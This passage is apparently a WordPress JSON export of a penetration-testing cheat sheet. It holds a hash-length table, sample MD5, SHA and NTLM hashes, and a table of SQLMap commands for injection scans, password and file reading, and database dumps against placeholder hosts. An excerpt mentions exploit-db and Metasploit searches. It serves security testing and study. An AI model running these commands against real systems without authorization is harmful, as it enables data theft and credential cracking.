# copy running-config startup-config<\/code><\/td>\nCopy startup-config to running-config<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Cryptography<\/i><\/h2>\n
Hash Lengths<\/i><\/h3>\n
\n\n\n\n\n\n\n\n\n
HASH<\/th>\nSIZE<\/th>\n<\/tr>\n<\/thead>\n
MD5 Hash Length<\/td>\n16 Bytes<\/code><\/td>\n<\/tr>\n
SHA-1 Hash Length<\/td>\n20 Bytes<\/code><\/td>\n<\/tr>\n
SHA-256 Hash Length<\/td>\n32 Bytes<\/code><\/td>\n<\/tr>\n
SHA-512 Hash Length<\/td>\n64 Bytes<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
Hash Examples<\/i><\/h3>\n
Likely just use hash-identifier<\/strong> for this but here are some example hashes:<\/p>\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
HASH<\/th>\nEXAMPLE<\/th>\n<\/tr>\n<\/thead>\n
MD5 Hash Example<\/td>\n8743b52063cd84097a65d1633f5c74f5<\/code><\/td>\n<\/tr>\n
MD5 $PASS:$SALT Example<\/td>\n01dfae6e5d4d90d9892622325959afbe:7050461<\/code><\/td>\n<\/tr>\n
MD5 $SALT:$PASS<\/td>\nf0fda58630310a6dd91a7d8f0a4ceda2:4225637426<\/code><\/td>\n<\/tr>\n
SHA1 Hash Example<\/td>\nb89eaac7e61417341b710b727768294d0e6a277b<\/code><\/td>\n<\/tr>\n
SHA1 $PASS:$SALT<\/td>\n2fc5a684737ce1bf7b3b239df432416e0dd07357:2014<\/code><\/td>\n<\/tr>\n
SHA1 $SALT:$PASS<\/td>\ncac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024<\/code><\/td>\n<\/tr>\n
SHA-256<\/td>\n127e6fbfe24a750e72930c220a8e138275656b
\n8e5d8f48a98c3c92df2caba935<\/code><\/td>\n<\/tr>\n
SHA-256 $PASS:$SALT<\/td>\nc73d08de890479518ed60cf670d17faa26a4a7
\n1f995c1dcc978165399401a6c4<\/code><\/td>\n<\/tr>\n
SHA-256 $SALT:$PASS<\/td>\neb368a2dfd38b405f014118c7d9747fcc97f4
\nf0ee75c05963cd9da6ee65ef498:560407001617<\/code><\/td>\n<\/tr>\n
SHA-512<\/td>\n82a9dda829eb7f8ffe9fbe49e45d47d2dad9
\n664fbb7adf72492e3c81ebd3e29134d9bc
\n12212bf83c6840f10e8246b9db54a4
\n859b7ccd0123d86e5872c1e5082f<\/code><\/td>\n<\/tr>\n
SHA-512 $PASS:$SALT<\/td>\ne5c3ede3e49fb86592fb03f471c35ba13e8
\nd89b8ab65142c9a8fdafb635fa2223c24e5
\n558fd9313e8995019dcbec1fb58414
\n6b7bb12685c7765fc8c0d51379fd<\/code><\/td>\n<\/tr>\n
SHA-512 $SALT:$PASS<\/td>\n976b451818634a1e2acba682da3fd6ef
\na72adf8a7a08d7939550c244b237c72c7d4236754
\n4e826c0c83fe5c02f97c0373b6b1
\n386cc794bf0d21d2df01bb9c08a<\/code><\/td>\n<\/tr>\n
NTLM Hash Example<\/td>\nb4b9b02e6f09a9bd760f388b67351e2b<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n
SQLMap Examples<\/i><\/h2>\n
\n\n\n\n\n\n\n\n\n\n
COMMAND<\/th>\nDESCRIPTION<\/th>\n<\/tr>\n<\/thead>\n
sqlmap -u http:\/\/meh.com --forms --batch --crawl=10
\n--cookie=jsessionid=54321 --level=5 --risk=3<\/code><\/td>\n		Automated sqlmap scan<\/td>\n<\/tr>\n
 sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
\n--level=3 --current-user --current-db --passwords
\n--file-read=\"\/var\/www\/blah.php\" <\/code><\/td>\n		Targeted sqlmap scan<\/td>\n<\/tr>\n
sqlmap -u \"http:\/\/meh.com\/meh.php?id=1\"
\n--dbms=mysql --tech=U --random-agent --dump <\/code><\/td>\n		Scan url for union + error based injection with mysql backend
\nand use a random user agent + database dump<\/td>\n<\/tr>\n
sqlmap -o -u \"http:\/\/meh.com\/form\/\" --forms<\/code><\/td>\nsqlmap check form for injection<\/td>\n<\/tr>\n
sqlmap -o -u \"http:\/\/meh\/vuln-form\" --forms
\n-D database-name -T users --dump<\/code><\/td>\n		sqlmap dump and crack hashes for table users on database-name.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n","protected":false},"excerpt":{"rendered":"
BOF \/ Exploit Exploit Research Find exploits for enumerated hosts \/ services. COMMAND DESCRIPTION searchsploit windows 2003 | grep -i local Search exploit-db for exploit, in this example windows 2003 + local esc site:exploit-db.com exploit kernel <= 3 Use google to search exploit-db.com for exploits grep -R “W7” \/usr\/share\/metasploit-framework \/modules\/exploit\/windows\/* Search metasploit modules using grep … Continue reading Notes<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1329","post","type-post","status-publish","format-standard","hentry","category-general"],"_links":{"self":[{"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/posts\/1329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/comments?post=1329"}],"version-history":[{"count":0,"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/posts\/1329\/revisions"}],"wp:attachment":[{"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/media?parent=1329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/categories?post=1329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/easy-admin.ca\/index.php\/wp-json\/wp\/v2\/tags?post=1329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}